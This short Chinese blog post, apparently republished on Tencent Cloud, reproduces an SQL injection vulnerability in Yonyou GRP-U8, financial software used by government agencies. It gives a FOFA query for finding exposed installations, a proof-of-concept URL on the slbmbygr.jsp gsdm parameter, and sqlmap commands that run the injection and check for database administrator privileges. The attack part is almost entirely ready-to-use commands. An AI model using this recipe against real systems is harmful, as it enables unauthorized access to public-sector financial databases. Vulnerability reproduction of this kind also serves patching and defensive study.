【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞
【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞
没事就要多学习
发布于 2024-07-18 15:48:27
发布于 2024-07-18 15:48:27
文章被收录于专栏:Cyber Security
一、漏洞描述
用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png
二、网络空间搜索引擎搜索
fofa查询语法
app="用友-GRP-U8"
在这里插入图片描述
三、漏洞利用
POC:拼接/u8qx/slbmbygr.jsp?gsdm=1 访问
在这里插入图片描述
漏洞存在
在这里插入图片描述
漏洞不存在
使用SQLmap进行注入利用
sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*"
在这里插入图片描述
查询当前用户权限
sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*" --batch --is-dba 
在这里插入图片描述
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-07-18,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
